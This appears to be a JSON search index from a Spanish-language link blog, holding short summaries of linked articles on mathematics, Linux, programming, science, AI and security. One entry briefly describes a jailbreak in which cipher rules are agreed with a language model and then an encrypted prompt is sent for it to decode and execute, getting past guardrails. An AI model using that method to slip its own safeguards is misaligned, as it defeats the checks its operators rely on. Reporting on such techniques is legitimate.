[{"content":" El operador Exp–Minus–Log (EML) muestra que, usando una sola función (y la constante 1), se pueden generar números, operaciones y funciones elementales —desde e hasta la unidad imaginaria— mediante expresiones anidadas. Este artículo explica la construcción, ofrece ejemplos y plantea dudas sobre posibles argumentos circulares.\n» ^DiAmOnD^ | gaussianos.com\n","permalink":"http://karpoke.ignaciocano.com/2026/04/27/eml-una-funcion-para-generarlas-a-todas/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl operador Exp–Minus–Log (EML) muestra que, usando una sola función\n(y la constante 1), se pueden generar números, operaciones y funciones\nelementales —desde e hasta la unidad imaginaria— mediante expresiones\nanidadas. Este artículo explica la construcción, ofrece ejemplos y\nplantea dudas sobre posibles argumentos circulares.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» ^DiAmOnD^ | \u003ca href=\"https://www.gaussianos.com/eml-una-funcion-para-generarlas-a-todas/\"\u003egaussianos.com\u003c/a\u003e\u003c/p\u003e","title":"EML: una función para generarlas a todas"},{"content":" La técnica de utilizar las capacidades de cifrado para saltar los controles de los guardarraíles fue publicada en el año 2023, y se basa en establecer con el modelo unas reglas de cifrado y descifrado del contenido, para luego enviarle el contenido de otro Prompt cifrado, y que él mismo lo ejecute.\n» elladodelmal.com | elladodelmal.com\n","permalink":"http://karpoke.ignaciocano.com/2026/04/01/cyphering-prompts-answers-para-evadir-guardarrailes/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLa técnica de utilizar las capacidades de cifrado para saltar los controles\nde los guardarraíles fue publicada en el año 2023, y se basa en establecer\ncon el modelo unas reglas de cifrado y descifrado del contenido, para luego\nenviarle el contenido de otro Prompt cifrado, y que él mismo lo ejecute.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» elladodelmal.com | \u003ca href=\"https://www.elladodelmal.com/2026/01/cyphering-prompts-para-evadir.html\"\u003eelladodelmal.com\u003c/a\u003e\u003c/p\u003e","title":"Cyphering Prompts \u0026 Answers para evadir Guardarraíles"},{"content":" A look at how I used shape vectors to achieve sharp, high-quality ASCII rendering.\n» alexharri.com | alexharri.com\n","permalink":"http://karpoke.ignaciocano.com/2026/04/01/ascii-characters-are-not-pixels-a-deep-dive-into-ascii-rendering/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA look at how I used shape vectors to achieve sharp, high-quality ASCII\nrendering.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» alexharri.com | \u003ca href=\"https://alexharri.com/blog/ascii-rendering\"\u003ealexharri.com\u003c/a\u003e\u003c/p\u003e","title":"ASCII characters are not pixels: a deep dive into ASCII rendering"},{"content":" Tutorial humorístico que explica, usando la metáfora de \u0026ldquo;documentales sobre el ciclo reproductivo de la langosta\u0026rdquo;, cómo ver contenido de IPTV por Internet mediante Acestream, VPNs (Mullvad, CyberGhost) y proxies para sortear los bloqueos de los ISPs españoles impuestos por orden judicial.\n» carademalo | meneame.net\n","permalink":"http://karpoke.ignaciocano.com/2026/03/07/como-ver-documentales-del-ciclo-reproductivo-de-la-langosta-por-internet-iptv-tu/","summary":"\u003cblockquote\u003e\n\u003cp\u003eTutorial humorístico que explica, usando la metáfora de \u0026ldquo;documentales\nsobre el ciclo reproductivo de la langosta\u0026rdquo;, cómo ver contenido de\nIPTV por Internet mediante Acestream, VPNs (Mullvad, CyberGhost) y\nproxies para sortear los bloqueos de los ISPs españoles impuestos por\norden judicial.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» carademalo | \u003ca href=\"https://www.meneame.net/story/como-ver-documentales-ciclo-reproductivo-langosta-internet-iptv\"\u003emeneame.net\u003c/a\u003e\u003c/p\u003e","title":"Cómo ver documentales del ciclo reproductivo de la langosta por Internet/IPTV [Tutorial]"},{"content":" How OpenAI scaled PostgreSQL to handle millions of queries per second for 800 million users. Through rigorous optimizations, connection pooling, caching strategies, and careful workload isolation, PostgreSQL powers ChatGPT with a single primary and nearly 50 read replicas across regions.\n» Bohan Zhang | openai.com\n","permalink":"http://karpoke.ignaciocano.com/2026/02/28/scaling-postgresql/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHow OpenAI scaled PostgreSQL to handle millions of queries per second for\n800 million users. Through rigorous optimizations, connection pooling,\ncaching strategies, and careful workload isolation, PostgreSQL powers\nChatGPT with a single primary and nearly 50 read replicas across regions.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Bohan Zhang | \u003ca href=\"https://openai.com/index/scaling-postgresql/\"\u003eopenai.com\u003c/a\u003e\u003c/p\u003e","title":"Scaling PostgreSQL"},{"content":" How a single hack infected the world’s most important operating system.\n» Veritasium | youtube.com\n","permalink":"http://karpoke.ignaciocano.com/2026/02/28/the-internet-was-weeks-away-from-disaster-and-no-one-knew/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHow a single hack infected the world’s most important operating system.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/aoag03mSuXQ?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cp\u003e» Veritasium | \u003ca href=\"https://www.youtube.com/watch?v=aoag03mSuXQ\"\u003eyoutube.com\u003c/a\u003e\u003c/p\u003e","title":"The Internet Was Weeks Away From Disaster and No One Knew"},{"content":" In this step-by-step tutorial, you\u0026rsquo;ll implement the classic hash table data structure using Python. Along the way, you\u0026rsquo;ll learn how to cope with various challenges such as hash code collisions while practicing test-driven development (TDD).\n» Real Python | realpython.com\n","permalink":"http://karpoke.ignaciocano.com/2026/02/28/build-a-hash-table-in-python-with-tdd-real-python/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIn this step-by-step tutorial, you\u0026rsquo;ll implement the classic hash table\ndata structure using Python. Along the way, you\u0026rsquo;ll learn how to cope\nwith various challenges such as hash code collisions while practicing\ntest-driven development (TDD).\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Real Python | \u003ca href=\"https://realpython.com/python-hash-table/\"\u003erealpython.com\u003c/a\u003e\u003c/p\u003e","title":"Build a Hash Table in Python With TDD – Real Python"},{"content":" A deep dive into the science behind blue light filters and why they may not actually be as effective as commonly claimed. Explores the research on how blue light affects sleep, eye strain, and cognitive performance.\n» Patrick Mineault | neuroai.science\n","permalink":"http://karpoke.ignaciocano.com/2026/02/25/blue-light-filters-dont-work/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA deep dive into the science behind blue light filters and why they may\nnot actually be as effective as commonly claimed. Explores the research\non how blue light affects sleep, eye strain, and cognitive performance.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Patrick Mineault | \u003ca href=\"https://www.neuroai.science/p/blue-light-filters-dont-work\"\u003eneuroai.science\u003c/a\u003e\u003c/p\u003e","title":"Blue Light Filters Don't Work"},{"content":" Por qué Linux AHORA es tan bueno en GAMING?\n» Nate Gentile | youtube.com\n","permalink":"http://karpoke.ignaciocano.com/2026/02/24/por-que-linux-ahora-es-tan-bueno-en-gaming/","summary":"\u003cblockquote\u003e\n\u003cp\u003ePor qué Linux AHORA es tan bueno en GAMING?\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/eqPQc0Y5HKE?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cp\u003e» Nate Gentile | \u003ca href=\"https://www.youtube.com/watch?v=eqPQc0Y5HKE\"\u003eyoutube.com\u003c/a\u003e\u003c/p\u003e","title":"Por qué Linux AHORA es tan bueno en GAMING?"},{"content":" La Inteligencia Artificial tiene mucha relación con el Linuxverso, por ello, hoy te ofrecemos esta segunda parte para aprender más sobre ella.\n» Jose Albert | blog.desdelinux.net\n","permalink":"http://karpoke.ignaciocano.com/2026/02/20/fundamentos-de-inteligencia-artificial-segunda-parte-origenes/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLa Inteligencia Artificial tiene mucha relación con el Linuxverso, por\nello, hoy te ofrecemos esta segunda parte para aprender más sobre ella.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Jose Albert | \u003ca href=\"https://blog.desdelinux.net/inteligencia-artificial-ia-para-linuxeros-segunda-parte/\"\u003eblog.desdelinux.net\u003c/a\u003e\u003c/p\u003e","title":"Fundamentos de Inteligencia Artificial - Segunda parte: Orígenes"},{"content":" Enabling Active Directory DNS Resolution on Ubuntu Problem Statement: An Ubuntu VM needs to communicate with several Windows VMs that are m\u0026hellip;\n» tuxthink.blogspot.com | tuxthink.blogspot.com\n","permalink":"http://karpoke.ignaciocano.com/2026/02/17/resolve-dns-name-in-ubuntu/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEnabling Active Directory DNS Resolution on Ubuntu Problem Statement: An\nUbuntu VM needs to communicate with several Windows VMs that are m\u0026hellip;\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» tuxthink.blogspot.com | \u003ca href=\"https://tuxthink.blogspot.com/2026/02/resolve-dns-name-in-ubuntu.html\"\u003etuxthink.blogspot.com\u003c/a\u003e\u003c/p\u003e","title":"Resolve DNS name in ubuntu"},{"content":" Aprende a montar tu entorno de desarrollo remoto con Code Server y Docker para programar profesionalmente desde cualquier tablet Android o navegador.\n» atareao con Linux | atareao.es\n","permalink":"http://karpoke.ignaciocano.com/2026/02/17/adios-a-las-excusas-como-monte-mi-vs-code-en-un-servidor/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAprende a montar tu entorno de desarrollo remoto con Code Server y\nDocker para programar profesionalmente desde cualquier tablet Android o\nnavegador.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» atareao con Linux | \u003ca href=\"https://atareao.es/podcast/adios-a-las-excusas-como-monte-mi-vs-code-en-un-servidor/\"\u003eatareao.es\u003c/a\u003e\u003c/p\u003e","title":"Adiós a las excusas. Cómo monté mi VS Code en un servidor"},{"content":" Debian\u0026rsquo;s official tagline is \u0026ldquo;Universal Operating System\u0026rdquo;. It\u0026rsquo;s more than just a tagline: it\u0026rsquo;s a deeper concept that underpins the very nature of Debian as a project.\n» It\u0026rsquo;s FOSS | itsfoss.com\n","permalink":"http://karpoke.ignaciocano.com/2026/02/17/why-is-debian-called-the-universal-operating-system-again/","summary":"\u003cblockquote\u003e\n\u003cp\u003eDebian\u0026rsquo;s official tagline is \u0026ldquo;Universal Operating System\u0026rdquo;. It\u0026rsquo;s more\nthan just a tagline: it\u0026rsquo;s a deeper concept that underpins the very\nnature of Debian as a project.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» It\u0026rsquo;s FOSS | \u003ca href=\"https://itsfoss.com/debian-universal-operating-system/\"\u003eitsfoss.com\u003c/a\u003e\u003c/p\u003e","title":"Why is Debian Called the Universal Operating System, Again?"},{"content":" Linus Torvalds, creador de Linux, compara la programación con el deporte: para mejorar hay que practicar constantemente. Reflexiones sobre dedicación, disciplina y el futuro del desarrollo de software.\n» elhacker.NET | blog.elhacker.net\n","permalink":"http://karpoke.ignaciocano.com/2026/02/16/linus-torvalds-creador-de-linux-la-programacion-es-como-cualquier-deporte-tienes/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLinus Torvalds, creador de Linux, compara la programación con el\ndeporte: para mejorar hay que practicar constantemente. Reflexiones\nsobre dedicación, disciplina y el futuro del desarrollo de software.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» elhacker.NET | \u003ca href=\"https://blog.elhacker.net/2026/02/linus-torvalds-creador-de-linux-la.html\"\u003eblog.elhacker.net\u003c/a\u003e\u003c/p\u003e","title":"Linus Torvalds, creador de Linux: \"La programación es como cualquier deporte, tienes que trabajar duro. Si solo juegas al golf un día a la semana, no mejoras mucho\""},{"content":" 1995: El punto de inflexión de la ofimática y la informática personal\n» Manuel Llaca | parceladigital.com\n","permalink":"http://karpoke.ignaciocano.com/2026/02/13/1995-el-punto-de-inflexion-de-la-ofimatica-y-la-informatica-personal/","summary":"\u003cblockquote\u003e\n\u003cp\u003e1995: El punto de inflexión de la ofimática y la informática personal\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Manuel Llaca | \u003ca href=\"https://parceladigital.com/podcast/1995-el-punto-de-inflexion-de-la-ofimatica-y-la-informatica-personal\"\u003eparceladigital.com\u003c/a\u003e\u003c/p\u003e","title":"1995: El punto de inflexión de la ofimática y la informática personal"},{"content":" Writing code can be similar to writing tutorials. In both cases, you’ll typically need to create and work on multiple drafts before reaching the final version. In an ideal setting, you would write cod\n» freeCodeCamp.org | freecodecamp.org\n","permalink":"http://karpoke.ignaciocano.com/2026/02/09/how-to-save-multiple-drafts-in-git-a-guide-to-using-stash/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWriting code can be similar to writing tutorials. In both cases, you’ll\ntypically need to create and work on multiple drafts before reaching the\nfinal version. In an ideal setting, you would write cod\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» freeCodeCamp.org | \u003ca href=\"https://www.freecodecamp.org/news/how-to-save-multiple-drafts-in-git-a-guide-to-using-stash/\"\u003efreecodecamp.org\u003c/a\u003e\u003c/p\u003e","title":"How to Save Multiple Drafts in Git: A Guide to Using Stash"},{"content":" La termodinámica tiene mala fama: se enseña como la ciencia de las máquinas de vapor y los pistones. Pero si la estudias en profundidad y te acercas a sus límites, deja de ser ingeniería aburrida para convertirse en pura filosofía. Desde demonios que abren puertas moleculares hasta agujeros negros que se evaporan: un viaje matemático por los límites donde las reglas del universo parecen quebrarse.\n» Jose Luis Bernal | aulaquest.com\n","permalink":"http://karpoke.ignaciocano.com/2026/02/09/5-veces-que-la-termodinamica-casi-rompe-la-realidad-y-por-que-no-lo-hizo-aulaque/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLa termodinámica tiene mala fama: se enseña como la ciencia de las\nmáquinas de vapor y los pistones. Pero si la estudias en profundidad y\nte acercas a sus límites, deja de ser ingeniería aburrida para\nconvertirse en pura filosofía. Desde demonios que abren puertas\nmoleculares hasta agujeros negros que se evaporan: un viaje matemático\npor los límites donde las reglas del universo parecen quebrarse.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Jose Luis Bernal | \u003ca href=\"https://aulaquest.com/4-veces-que-la-termodinamica-casi-rompe-la-realidad-y-por-que-no-lo-hizo/\"\u003eaulaquest.com\u003c/a\u003e\u003c/p\u003e","title":"5 veces que la termodinámica casi rompe la realidad (y por qué no lo hizo)"},{"content":" Recopilación de emuladores legales que permiten jugar a miles de juegos retro de consolas clásicas, con opciones para diferentes plataformas y sistemas operativos.\n» elhacker.NET | blog.elhacker.net\n","permalink":"http://karpoke.ignaciocano.com/2026/02/08/emuladores-legales-para-tener-una-consola-con-miles-de-juegos-retro/","summary":"\u003cblockquote\u003e\n\u003cp\u003eRecopilación de emuladores legales que permiten jugar a miles de juegos\nretro de consolas clásicas, con opciones para diferentes plataformas y\nsistemas operativos.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» elhacker.NET | \u003ca href=\"https://blog.elhacker.net/2026/02/emuladores-legales-para-tener-una.html\"\u003eblog.elhacker.net\u003c/a\u003e\u003c/p\u003e","title":"Emuladores legales para tener una consola con miles de juegos retro"},{"content":" Herramienta para combinar líneas de uno o varios archivos en columnas, ideal para unir datos y generar tablas simples desde la terminal.\n» voidNull | voidnull.es\n","permalink":"http://karpoke.ignaciocano.com/2026/02/04/paste-combina-lineas-de-varios-ficheros-de-forma-horizontal/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHerramienta para combinar líneas de uno o varios archivos en columnas,\nideal para unir datos y generar tablas simples desde la terminal.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» voidNull | \u003ca href=\"https://voidnull.es/paste-combina-lineas-de-varios-ficheros-de-forma-horizontal/\"\u003evoidnull.es\u003c/a\u003e\u003c/p\u003e","title":"paste: combina lineas de varios ficheros de forma horizontal"},{"content":" Recopilación de los mejores proyectos de ciberseguridad disponibles en GitHub para el año 2026, incluyendo herramientas de pentesting, análisis de vulnerabilidades y recursos de formación.\n» HackHispano | foro.hackhispano.com\n","permalink":"http://karpoke.ignaciocano.com/2026/02/03/top-2026-de-proyectos-de-ciberseguridad-en-github/","summary":"\u003cblockquote\u003e\n\u003cp\u003eRecopilación de los mejores proyectos de ciberseguridad disponibles en\nGitHub para el año 2026, incluyendo herramientas de pentesting, análisis\nde vulnerabilidades y recursos de formación.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» HackHispano | \u003ca href=\"https://foro.hackhispano.com/threads/48964-Top-2026-de-proyectos-de-ciberseguridad-en-GitHub?goto=newpost\"\u003eforo.hackhispano.com\u003c/a\u003e\u003c/p\u003e","title":"Top 2026 de proyectos de ciberseguridad en GitHub"},{"content":" La IA está afectando a todas las áreas productivas. Hoy por hoy, parece que los más afectados somos los programadores, ya que es por donde ha empezado a func\n» Cecilio Álvarez Caules | arquitecturajava.com\n","permalink":"http://karpoke.ignaciocano.com/2026/02/03/el-superprogramador-como-la-ia-esta-cambiando-el-futuro-de-los-programadores/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLa IA está afectando a todas las áreas productivas. Hoy por hoy, parece\nque los más afectados somos los programadores, ya que es por donde ha\nempezado a func\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Cecilio Álvarez Caules | \u003ca href=\"https://www.arquitecturajava.com/el-superprogramador/\"\u003earquitecturajava.com\u003c/a\u003e\u003c/p\u003e","title":"El Superprogramador: cómo la IA está cambiando el futuro de los programadores"},{"content":" ¿Cuántos parámetros son demasiados parámetros?\n» José María Aguilar (jmaguilar) | variablenotfound.com\n","permalink":"http://karpoke.ignaciocano.com/2026/02/03/cuantos-parametros-son-demasiados-parametros/","summary":"\u003cblockquote\u003e\n\u003cp\u003e¿Cuántos parámetros son demasiados parámetros?\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» José María Aguilar (jmaguilar) | \u003ca href=\"https://www.variablenotfound.com/2026/02/cuantos-parametros-son-demasiados.html\"\u003evariablenotfound.com\u003c/a\u003e\u003c/p\u003e","title":"¿Cuántos parámetros son demasiados parámetros?"},{"content":" Wiz Research exposes a critical flaw in Moltbook, the AI-only social network. 1.5M API tokens and plaintext OpenAI keys leaked due to AI-coded security gaps.\n» Ddos | securityonline.info\n","permalink":"http://karpoke.ignaciocano.com/2026/02/03/the-vibe-coding-disaster-how-a-simple-bug-exposed-4-75-million-records-on-the-ai/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWiz Research exposes a critical flaw in Moltbook, the AI-only social\nnetwork. 1.5M API tokens and plaintext OpenAI keys leaked due to\nAI-coded security gaps.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Ddos | \u003ca href=\"https://securityonline.info/the-vibe-coding-disaster-how-a-simple-bug-exposed-4-75-million-records-on-the-ai-social-network-moltbook/\"\u003esecurityonline.info\u003c/a\u003e\u003c/p\u003e","title":"The \"Vibe Coding\" Disaster: How a Simple Bug Exposed 4.75 Million Records on the AI Social Network Moltbook"},{"content":" Lejos de pretender sustituir directamente a cp, cpx se presenta como una alternativa moderna pensada para escenarios más exigentes\u0026hellip;\n» RubenMaverick | sololinux.es\n","permalink":"http://karpoke.ignaciocano.com/2026/01/30/cpx-una-alternativa-moderna-y-mas-rapida-al-comando-cp-en-linux-sololinux/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLejos de pretender sustituir directamente a cp, cpx se presenta como una\nalternativa moderna pensada para escenarios más exigentes\u0026hellip;\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» RubenMaverick | \u003ca href=\"https://sololinux.es/cpx-una-alternativa-moderna-y-mas-rapida-al-comando-cp-en-linux/\"\u003esololinux.es\u003c/a\u003e\u003c/p\u003e","title":"cpx: una alternativa moderna y más rápida al comando cp en Linux | SoloLinux"},{"content":" El pasado viernes, Richard Stallman, de 72 años, ofreció una presentación de dos horas y 20 minutos en el Instituto Tecnológico de Georgia, donde habló sobre temas como la IA, los coches conectados , los smartphones, las leyes de verificación de edad y su distribución de Linux…\n» Javier Orovengua | linuxparty.es\n","permalink":"http://karpoke.ignaciocano.com/2026/01/30/le-preguntaron-a-richard-stallman-es-mala-la-pirateria-de-software/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl pasado viernes, Richard Stallman, de 72 años, ofreció una\npresentación de dos horas y 20 minutos en el Instituto Tecnológico de\nGeorgia, donde habló sobre temas como la IA, los coches conectados , los\nsmartphones, las leyes de verificación de edad y su distribución de\nLinux…\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Javier Orovengua | \u003ca href=\"https://www.linuxparty.es/60-software/12632-le-preguntaron-a-richard-stallman-%C2%BFes-mala-la-pirater%C3%ADa-de-software.html\"\u003elinuxparty.es\u003c/a\u003e\u003c/p\u003e","title":"Le preguntaron a Richard Stallman: ¿Es mala la piratería de software?"},{"content":" Uno de los principales “argumentos” que han expuesto desde siempre los creyentes de las alucinaciones judeocristianas para defender la existencia de un dios “creador” y negar el evolucionismo ha si…\n» La Ciencia y sus Demonios | cnho.wordpress.com\n","permalink":"http://karpoke.ignaciocano.com/2026/01/30/el-maravilloso-ojo-humano-seguro/","summary":"\u003cblockquote\u003e\n\u003cp\u003eUno de los principales “argumentos” que han expuesto desde siempre los\ncreyentes de las alucinaciones judeocristianas para defender la\nexistencia de un dios “creador” y negar el evolucionismo ha si…\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» La Ciencia y sus Demonios | \u003ca href=\"https://cnho.wordpress.com/2026/01/30/el-maravilloso-ojo-humano-seguro/\"\u003ecnho.wordpress.com\u003c/a\u003e\u003c/p\u003e","title":"El maravilloso ojo humano ¿seguro?"},{"content":" Kaitai Struct is a formal language for binary format specification that can be compiled into parser code\n» formats.kaitai.io | formats.kaitai.io\n","permalink":"http://karpoke.ignaciocano.com/2026/01/29/file-format-gallery-for-kaitai-struct/","summary":"\u003cblockquote\u003e\n\u003cp\u003eKaitai Struct is a formal language for binary format specification that\ncan be compiled into parser code\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» formats.kaitai.io | \u003ca href=\"https://formats.kaitai.io/\"\u003eformats.kaitai.io\u003c/a\u003e\u003c/p\u003e","title":"File Format Gallery for Kaitai Struct"},{"content":" Richard Stallman, fundador del movimiento del software libre, critica el término \u0026ldquo;inteligencia artificial\u0026rdquo; y propone llamarla \u0026ldquo;inteligencia fingida\u0026rdquo;, argumentando que estos sistemas no poseen verdadera inteligencia.\n» elhacker.NET | blog.elhacker.net\n","permalink":"http://karpoke.ignaciocano.com/2026/01/26/richard-stallman-el-inventor-del-codigo-abierto-llaman-inteligencia-artificial-a/","summary":"\u003cblockquote\u003e\n\u003cp\u003eRichard Stallman, fundador del movimiento del software libre, critica\nel término \u0026ldquo;inteligencia artificial\u0026rdquo; y propone llamarla \u0026ldquo;inteligencia\nfingida\u0026rdquo;, argumentando que estos sistemas no poseen verdadera\ninteligencia.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» elhacker.NET | \u003ca href=\"https://blog.elhacker.net/2026/01/richard-stallman-el-inventor-del-codigo.html\"\u003eblog.elhacker.net\u003c/a\u003e\u003c/p\u003e","title":"Richard Stallman, el inventor del código abierto: \"Llaman inteligencia artificial a lo que no es, yo lo llamo inteligencia fingida\""},{"content":" Dynamic programming (DP) is often considered one of the most intimidating topics in coding interviews. It has a reputation for being abstract and counterintuitive, but it doesn\u0026rsquo;t have to be. We just published a comprehensive Dynamic Programming cours\u0026hellip;\n» freeCodeCamp.org | freecodecamp.org\n","permalink":"http://karpoke.ignaciocano.com/2026/01/21/learn-dynamic-programming-through-dynamic-visuals/","summary":"\u003cblockquote\u003e\n\u003cp\u003eDynamic programming (DP) is often considered one of the most\nintimidating topics in coding interviews. It has a reputation for being\nabstract and counterintuitive, but it doesn\u0026rsquo;t have to be. We just\npublished a comprehensive Dynamic Programming cours\u0026hellip;\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» freeCodeCamp.org | \u003ca href=\"https://www.freecodecamp.org/news/learn-dynamic-programming-through-dynamic-visuals/\"\u003efreecodecamp.org\u003c/a\u003e\u003c/p\u003e","title":"Learn Dynamic Programming Through Dynamic Visuals"},{"content":" Libros de \u0026ldquo;Ciberseguridad paso a paso\u0026rdquo; disponibles para descarga gratuita. Recursos de formación en ciberseguridad publicados por Chema Alonso en su blog El lado del mal.\n» Chema Alonso | elladodelmal.com\n","permalink":"http://karpoke.ignaciocano.com/2026/01/12/libros-de-ciberseguridad-paso-a-paso-disponibles-para-descarga-gratuita/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLibros de \u0026ldquo;Ciberseguridad paso a paso\u0026rdquo; disponibles para descarga\ngratuita. Recursos de formación en ciberseguridad publicados por Chema\nAlonso en su blog El lado del mal.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Chema Alonso | \u003ca href=\"https://www.elladodelmal.com/2026/01/libros-de-ciberseguridad-paso-paso.html\"\u003eelladodelmal.com\u003c/a\u003e\u003c/p\u003e","title":"Libros de \"Ciberseguridad paso a paso\" disponibles para descarga gratuita"},{"content":" Your software’s speed needs some form of testing; big-O scaling is a good starting point.\n» Itamar Turner-Trauring | pythonspeed.com\n","permalink":"http://karpoke.ignaciocano.com/2026/01/11/unit-testing-your-codes-performance-part-1-big-o-scaling/","summary":"\u003cblockquote\u003e\n\u003cp\u003eYour software’s speed needs some form of testing; big-O scaling is a\ngood starting point.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Itamar Turner-Trauring | \u003ca href=\"https://pythonspeed.com/articles/big-o-tests/\"\u003epythonspeed.com\u003c/a\u003e\u003c/p\u003e","title":"Unit testing your code’s performance, part 1: Big-O scaling"},{"content":" Meta’s end-to-end encrypted messaging app is used by billions of people. Here’s how to make sure you’re one of the most locked-down ones out there.\n» Kate O\u0026rsquo;Flaherty | wired.com\n","permalink":"http://karpoke.ignaciocano.com/2026/01/06/8-whatsapp-features-to-boost-your-security-and-privacy/","summary":"\u003cblockquote\u003e\n\u003cp\u003eMeta’s end-to-end encrypted messaging app is used by billions of people.\nHere’s how to make sure you’re one of the most locked-down ones out\nthere.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Kate O\u0026rsquo;Flaherty | \u003ca href=\"https://www.wired.com/story/5-features-that-boost-security-and-privacy-on-whatsapp/\"\u003ewired.com\u003c/a\u003e\u003c/p\u003e","title":"8 WhatsApp Features to Boost Your Security and Privacy"},{"content":" Otros agentes acelulares como viroides, virusoides y priones también causan enfermedades. Los viroides consisten en ARNmc pequeños y desnudos que causan enfermedades en las plantas. Los …\n» LibreTexts Español | espanol.libretexts.org\n","permalink":"http://karpoke.ignaciocano.com/2026/01/05/6-4-viroides-virusoides-y-priones/","summary":"\u003cblockquote\u003e\n\u003cp\u003eOtros agentes acelulares como viroides, virusoides y priones también\ncausan enfermedades. Los viroides consisten en ARNmc pequeños y desnudos\nque causan enfermedades en las plantas. Los …\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» LibreTexts Español | \u003ca href=\"https://espanol.libretexts.org/Bookshelves/Biologia/Microbiologia/Microbiolog%C3%ADa_(OpenStax)/06:_Pat%C3%B3genos_acelulares/6.04:_Viroides,_Virusoides_y_Priones\"\u003eespanol.libretexts.org\u003c/a\u003e\u003c/p\u003e","title":"6.4: Viroides, Virusoides y Priones"},{"content":" An exploration of how classic image algorithms and CRT-era visuals come alive through real-time shaders on the web.\n» Codrops | tympanus.net\n","permalink":"http://karpoke.ignaciocano.com/2026/01/05/efecto-building-real-time-ascii-and-dithering-effects-with-webgl-shaders-codrops/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAn exploration of how classic image algorithms and CRT-era visuals come\nalive through real-time shaders on the web.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Codrops | \u003ca href=\"https://tympanus.net/codrops/2026/01/04/efecto-building-real-time-ascii-and-dithering-effects-with-webgl-shaders/\"\u003etympanus.net\u003c/a\u003e\u003c/p\u003e","title":"Efecto: Building Real-Time ASCII and Dithering Effects with WebGL Shaders | Codrops"},{"content":" Hace unos días, el comentario más votado en la noticia sobre la simulación de agujeros negros decía justamente eso:\n» Menéame | meneame.net\n","permalink":"http://karpoke.ignaciocano.com/2026/01/03/recordais-el-paper-sobre-agujeros-negros-que-llego-a-portada-he-programado-una-s/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHace unos días, el comentario más votado en la noticia sobre la\nsimulación de agujeros negros decía justamente eso:\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Menéame | \u003ca 